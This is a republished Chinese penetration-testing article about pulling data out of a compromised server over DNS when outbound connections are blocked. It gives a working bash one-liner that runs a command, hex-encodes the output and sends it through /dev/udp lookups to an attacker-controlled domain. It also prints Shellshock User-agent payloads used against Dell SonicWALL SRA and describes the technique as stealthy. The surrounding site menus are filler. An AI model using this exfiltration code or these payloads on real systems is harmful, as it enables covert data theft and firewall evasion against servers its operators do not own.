如何在渗透测试中利用BASH和DNS下载数据

来源:互联网
更新时间:2016/12/9 11:17:23
责任编辑:鲁晓倩
字体:

在渗透测试过程中,拿到服务器权限之后从服务器下载数据是一件比较费劲的事情,因为服务器一般都有防火墙在前面挡着。防火墙一般都会禁止服务器对外建立连接,这种情况下使用DNS来下载数据是一种行之有效的方法,因为防火墙一般不会禁止对外的DNS查询,本文中作者将根据一个具体的实例来讲解这个方法。

原理简述‍‍

其实已经有一些方法可以搞定这件事情,来将服务器上的数据拖出来,但是存在的问题是,这些既有的方法都需要借助一些Linux上的软件,而有时候并不是所有环境中都装了这些软件。比如我常用A软件来拖数据,但是如果遇到一台服务器上没有这软件,就白瞎了。所以,本文中使用BASH本身的功能来达到这一目的——通用、好用。

下面的代码就是 POC:

LINE=`id`; domain="yourdomain.com";while read -r -n 1 char;

do var+=$(printf "%X" \'$char\');done<<<$LINE;b=0;e=60;l=${#var};

while [ $b -lt $l ];do >& /dev/udp/$RANDOM.$b."${var:$b:$e}".

$domain/53 0>&1;let b=b+60;done;>& /dev/udp/$RANDOM.theend.$domain/53

0>&1;unset var;unset var2

将上面的 domain 改为你自己的 DNS 服务器地址,LINE 是要执行的系统命令,比如上例中是查看当前id,domain指向你自己的server 地址,用来接受数据。在你自己的 server 上运行下面这段 ruby 脚本:

dns.rb

这段脚本用来获取数据,比如执行下面这段脚本:

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 428px; height: 54px" border="0" alt="如何在渗透测试中利用BASH和DNS下载数据" src="http://img.xue163.com/s5images51cto/wyfs02/M02/58/EE/wKioL1TBqUbTyWBwAADwrsRvqWA203.jpg" width="690" height="76" />

在自己的机器上接受到的数据如下:

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 431px; height: 49px" border="0" alt="如何在渗透测试中利用BASH和DNS下载数据" src="http://img.xue163.com/s1images51cto/wyfs02/M02/58/F0/wKiom1TBqH_R0YMUAABVtat3QkE699.jpg" width="690" height="69" />

显然这是一个行之有效的方法,但是,如果你遇到什么问题,可以直接找[原博]跟作者交流。

一个实际案例

‍‍之前我发现Dell SonicWALL Secure Remote Access (SRA)系列软件有Shellshock漏洞,当在http header中携带下面这样的ua ,server返回的是200 :‍‍

User-agent: () { :; }; /bin/ls

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 455px; height: 87px" border="0" alt="如何在渗透测试中利用BASH和DNS下载数据" src="http://img.xue163.com/s5images51cto/wyfs02/M00/58/F1/wKiom1TBqMGTxqqNAACO-tRAPlM429.jpg" width="690" height="135" />

但是如果提交包含如下User-agent的请求,server端返回 500 错误:

User-agent: () { :; }; /bin/fake

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 481px; height: 73px" border="0" alt="如何在渗透测试中利用BASH和DNS下载数据" src="http://img.xue163.com/s3images51cto/wyfs02/M01/58/F1/wKiom1TBqNqQBr2mAACAv22LcSw431.jpg" width="690" height="134" />

当然也可以用下面的User-agent的请求确定,这套软件确实有漏洞:

User-agent: () { :; }; /bin/sleep 60

现在问题来了,在这种情况下,我只能执行命令,却无法得到回显,我尝试了所有对外的链接,都被 server 禁止了,只有 DNS 可以用,可以用 telnet 来发起 DNS 请求。在这种情况下,上面我给出的 POC 就变得很有用了,并且非常隐蔽。

其他

目前Dell已经修复了这个漏洞,相关信息见:

https://support.software.dell.com/product-notification/133206?productName=SonicWALL%20SRA%20Series

参考信息来源:https://forsec.nl/2015/01/bash-data-exfiltration-through-dns-using-bash-builtin-functions/

【编辑推荐】

  1. 渗透测试工具Mimikatz ON Metasploit
  2. 自动化渗透测试工具——Heybe
  3. Android渗透测试工具——zANTI(汉化版)
  4. 如何采取衡量的方法来进行自动化渗透测试?
  5. 硬件渗透测试平台——Power Pwn
www.xue163.com true /5/56684.html report 6053 如何在渗透测试中利用BASH和DNS下载数据,在渗透测试过程中,拿到服务器权限之后从服务器下载数据是一件比较费劲的事情,因为服务器一般都有防火墙在前面挡着。防火墙一般都会禁止服务器对外建立连接,这种情况下使用DNS来下载数据是一种行之有效的方法,因为防火墙一般不会禁止对外的DNS查询,本文中作者...
最近关注
首页推荐
热门图片
最新添加资讯
24小时热门资讯
渗透测试 利用BA反渗透净水器废水利用渗透测试 ba反渗透净水机废水利用渗透 ba如何学习渗透测试反渗透废水利用如何开始你的渗透测试利用phpinfo进行渗透
精彩资讯
精彩推荐
热点推荐
真视界
精彩图片
社区精粹
关于本站 | 广告服务 | 手机版 | 商务合作 | 免责申明 | 招聘信息 | 联系我们
Copyright © 2004-2016 Xue163.com All Rights Reserved. 中国学网 版权所有
京ICP备10044368号-1 京公网安备11010802011102号
荐闻 | 学网头条知识问答 | 装修 | 作业 | 荐闻 | 学网头条精彩微信 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 猎奇 | 精彩看点 | 图库 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 精彩微信 | 猎奇 | 精彩看点 | 图库编程 方案 信息windows方案windows answer文档机构教育文档问答中心IT编程数码信息解决方案信息中心IT科技